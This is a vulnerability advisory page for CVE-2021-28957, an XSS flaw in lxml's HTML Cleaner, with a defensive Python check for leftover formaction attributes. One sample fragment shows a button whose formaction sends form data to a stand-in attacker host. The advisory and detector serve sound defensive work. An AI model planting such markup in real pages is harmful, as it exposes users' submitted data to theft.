CVE-2021-28957: Cross-site Scripting in lxml

CWE-79: Cross-site Scripting
10 documents, 8 sources

Severity: 6.1 MEDIUM (NVD)
EPSS: 0.5% (top 33.23%)
CISA KEV: Not in KEV
Exploit: No known exploits
Timeline: Published Mar 21; Latest update Apr 8

Description

An XSS vulnerability was discovered in python-lxml's clean module in versions before 4.6.3. When the safe_attrs_only and forms arguments are disabled, the Cleaner class does not remove the formaction attribute, allowing JavaScript to bypass the sanitizer. A remote attacker could exploit this flaw to run arbitrary JavaScript in the browsers of users who interact with the incorrectly sanitized HTML. This issue is patched in lxml 4.6.3.
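As an added defensive check, not code from cvebase or the lxml project: a standard-library-only scan of sanitizer output that flags any element carrying the formaction attribute which, per the description, a Cleaner run with safe_attrs_only=False and forms=False on a version before 4.6.3 leaves in place, so affected deployments can reject such output until they upgrade. The class and function names are assumed and the sample fragments are constructed.

```python
# Added example (not from cvebase or the lxml project): a defence-in-depth check
# for HTML that has passed through lxml.html.clean.Cleaner with
# safe_attrs_only=False and forms=False on a version before 4.6.3. It walks the
# sanitizer output with the standard-library parser and reports every element
# carrying a formaction attribute (the attribute CVE-2021-28957 says is left in
# place), so such output can be rejected before it reaches a browser.
from html.parser import HTMLParser


class FormactionFinder(HTMLParser):
    """Collect (tag, formaction value) pairs for every element that sets formaction."""

    def __init__(self):
        super().__init__()
        self.hits = []

    def handle_starttag(self, tag, attrs):
        # The parser lowercases attribute names; a bare attribute has value None.
        # formaction is only meaningful on button and input, but flag it anywhere.
        for name, value in attrs:
            if name == "formaction":
                self.hits.append((tag, value or ""))


def find_formaction(html):
    """Return the list of (tag, value) pairs for formaction attributes in html."""
    parser = FormactionFinder()
    parser.feed(html)
    parser.close()
    return parser.hits


def is_safe_after_cleaning(html):
    """True only if the sanitized fragment contains no formaction attribute."""
    return not find_formaction(html)


# Constructed samples: a fragment a pre-4.6.3 Cleaner(safe_attrs_only=False,
# forms=False) would pass through unchanged, and a harmless fragment.
SAMPLE_PASSED_THROUGH = '<form><button formaction="https://evil.example/collect">go</button></form>'
SAMPLE_CLEAN = '<form><input type="submit" value="go"></form>'

if __name__ == "__main__":
    print(find_formaction(SAMPLE_PASSED_THROUGH))
    print(is_safe_after_cleaning(SAMPLE_CLEAN))
```

The proper fix remains upgrading to lxml 4.6.3 or leaving safe_attrs_only and forms at their defaults; this check only gates output in the meantime.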

CVSS vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N (Exploitability: 2.8 | Impact: 2.7)

Affected Packages (4 packages)

NVD: lxml/lxml < 4.6.3
PyPI: lxml/lxml < 4.6.3
Debian: lxml/lxml < 4.6.3-1+3

Also affects: Debian Linux 10.0, 9.0; Fedora 33, 34

Patches

Vulnerability Details (4 documents)

GHSA: lxml vulnerable to Cross-Site Scripting (2021-03-22)
OSV: lxml vulnerable to Cross-Site Scripting (2021-03-22)
OSV: CVE-2021-28957: An XSS vulnerability was discovered in python-lxml's clean module versions before 4 (2021-03-21)
CVEList: CVE-2021-28957: An XSS vulnerability was discovered in python-lxml's clean module versions before 4 (2021-03-21)

Vendor Advisories (5 documents)

Ubuntu: lxml vulnerability (2021-04-08)
Ubuntu: lxml vulnerability (2021-03-30)
Red Hat: python-lxml: Missing input sanitization for formaction HTML5 attributes may lead to XSS (2021-03-21)
Microsoft: An XSS vulnerability was discovered in python-lxml's clean module versions before 4.6.3. When disabling the safe_attrs_only and forms arguments the Cleaner class does not remove the formaction attribu (2021-03-09)
Debian: CVE-2021-28957: lxml - An XSS vulnerability was discovered in python-lxml's clean module versions befor... (2021)
CVE-2021-28957 — Cross-site Scripting in Lxml | cvebase